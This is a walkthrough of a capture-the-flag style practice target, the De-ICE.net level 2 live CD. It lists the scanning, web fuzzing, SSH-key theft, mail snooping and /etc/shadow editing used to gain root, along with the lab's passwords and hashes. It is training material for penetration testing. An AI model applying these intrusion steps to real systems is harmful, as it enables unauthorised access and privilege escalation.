De-ICE.net v2.0 (2.100) {Level 2 - Disk 1}

This is my walk though of how I broke into the De-ICE.net network, level 2, disk 1.

The De-ICE.net network is on a "live PenTest CD", that creates a target(s) on which to practise penetration testing; it has an "end goal" to reach.

Links

Watch video on-line:

Download video: http://download.g0tmi1k.com/videos_archive/De-ICE_v2.0_(2.100).mp4

Tools

  • BackTrack 4 (Final)
  • de-ice.net-2.100-1.0.iso (MD5: 09798f85bf54a666fbab947300f38163)
  • Dictionary(s)

Software

Name: De-ICE.net

Version: 2.0 (Level 1 - Disk 2 - IP Address: 2.100)

Home Page: http://www.de-ice.net/ or hxxp://heorot.net/livecds/

Download Link: hxxp://heorot.net/instruction/tutorials/iso/de-ice.net-2.100-1.1.iso (new: http://hackingdojo.com/dojo-media/)

Forums/Support: hxxp://forums.heorot.net/ or hxxp://forums.heorot.net/viewtopic.php?f=16&t=13

WiKi/Support: http://de-ice.net/hackerpedia/index.php/De-ICE.net_PenTest_Disks

Commands

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
nmap -n 192.168.2.1-255
nmap -n -sV -sS -O 192.168.2.100
nmap -n -sV -sS -O 192.168.2.101
firefox 192.168.2.100
[ ]kate -> list of possible usernames. Save. Filename: usernames.txt
firefox 192.168.2.101
[ ]BackTrack -> Vulnerability Identification -> Fuzzers -> JBroFuzz. Web Directories -> List of usernames (  root, admin) with '~' infront. -> [http://192.168.2.101][4] -> 80


firefox
[ ]kate -> Update usernames with the ones which we got a respond from. Save.
[ ]BackTrck -> Web Application Analysis -> Web (frontend) -> nikto2
./nikto.pl -host 192.168.2.101 -r ~pirrip/ -Display 124
firefox
// Save both files
mv /root/id_rsa /root/.ssh/id_rsa
mv /root/id_rsa.pub /root/.ssh/id_rsa.pub
chmod 000 /root/.ssh/id_rsa
chmod 000 /root/.ssh/id_rsa.pub
ssh [[email protected]][5]
// Yes

mailx
// 3 - we see that havisham passowrd is 'changeme'. 7 - we seen pirrip password is '0l1v3rTw1st'

cd /etc/
vi passwd

// kate -> Update usernames with only valid ones.

vi group
sudo vi shadow
// edit (D, :22,22y, :put, i, root, ESCape, ESCape, d   [->],[up],d d). Save it (:w), exit (:q). Password: 0l1v3rTw1st

su
// Password: 0l1v3rTw1st

cd /root/
ls -a
cd .save/
ls -a
chmod -R 777 /root/

//In BackTrack//
scp [[email protected]:/][6]root/.save/great_expectations.zip /root/
unzip great_expectations.zip
tar xf great_expectations.tar
strings Jan08

//In SSH//
sudo iv /var/mail/havisham
modprobe capability

//In BackTrack//
ftp 192.168.2.100
// Usrename: pirri. Password: 0l1v3rTw1st //
ls -a

//In SSH//
exit

//In BackTrack//
[ ]Firefox -> Send a REAL email to: [[email protected]][7]


----------------------------------------------------------------------------------------------------
Users
root:[email protected]     root:$1$/Ta1Q0lT$CSY9sjWR33Re2h5ohV4MX/:13882:0:::::
havisham:changeme       havisham:$1$qbY1hmdT$sVZn89wKvmLn0wP2JnZay1:13882:0:99999:7:::
pirrip:0l1v3rTw1st      pirrip:$1$KEj04HbT$ZTn.iEtQHcLQc6MjrG/Ig/:13882:0:99999:7:::
magwitch:               magwitch:$1$qG7/dIbT$HtTD946DE3ITkbrCINQvJ0:13882:0:99999:7:::
----------------------------------------------------------------------------------------------------

Notes

Song: Ashley Wallbridge - Masquerade (Original Mix)

Video length: 09:07

Capture length: 30:35

Blog Post: https://blog.g0tmi1k.com/2010/02/de-icenet-v20-1100-level-2-disk-1/

Dictionaries: https://blog.g0tmi1k.com/2010/02/sitenews-february-2010-isos-and/